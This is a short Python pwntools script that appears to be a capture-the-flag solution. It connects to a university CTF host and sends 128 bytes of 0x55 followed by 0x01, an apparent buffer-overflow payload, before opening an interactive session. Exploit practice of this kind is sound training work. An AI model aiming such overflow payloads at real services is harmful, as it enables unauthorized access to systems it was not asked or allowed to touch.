11 lines
181 B
Python
11 lines
181 B
Python
from pwn import *
|
|
|
|
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
|
PORT = 25151
|
|
|
|
conn = remote(HOST, PORT)
|
|
|
|
conn.recvuntil("0.\n")
|
|
conn.send(b"\x55"*128 + b"\x01\n")
|
|
conn.interactive()
|